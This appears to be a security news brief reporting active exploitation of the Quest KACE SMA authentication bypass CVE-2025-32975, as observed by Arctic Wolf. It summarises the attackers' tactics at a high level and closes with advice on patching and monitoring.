Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems
Threat actors are exploiting a maximum-severity security flaw impacting Quest KACE Systems Management Appliance (SMA), enabling them to impersonate users and potentially take over administrative accounts.
What happened
Threat actors are suspected to be exploiting a maximum-severity security flaw impacting Quest KACE Systems Management Appliance (SMA). Arctic Wolf observed malicious activity starting the week of March 9, 2026, in environments with unpatched SMA systems exposed to the internet, consistent with the exploitation of CVE-2025-32975.
CVE-2025-32975 (CVSS score: 10.0) refers to an authentication bypass vulnerability that allows attackers to impersonate legitimate users without valid credentials. Successful exploitation of this flaw could facilitate the complete takeover of administrative accounts. The issue was patched by Quest in May 2025.
In the malicious activity detected by Arctic Wolf, threat actors are believed to have weaponized this vulnerability to seize control of administrative accounts and execute remote commands to drop Base64-encoded payloads from an external server via the curl command.
Key actions taken by the threat actors include:
- Conducting credential harvesting using Mimikatz.
- Running discovery and reconnaissance commands to enumerate logged-in users and administrator accounts.
- Obtaining RDP access to backup infrastructure and domain controllers.
Why it matters
This incident underscores the importance of promptly applying patches and securing endpoint management systems to avoid potential security breaches that could lead to significant operational impact.
Recommended actions
- Administrators are advised to apply the latest updates for the KACE SMA and avoid exposing these instances to the internet.
- Regularly audit and monitor systems for any unusual activity and ensure endpoint management practices are robust.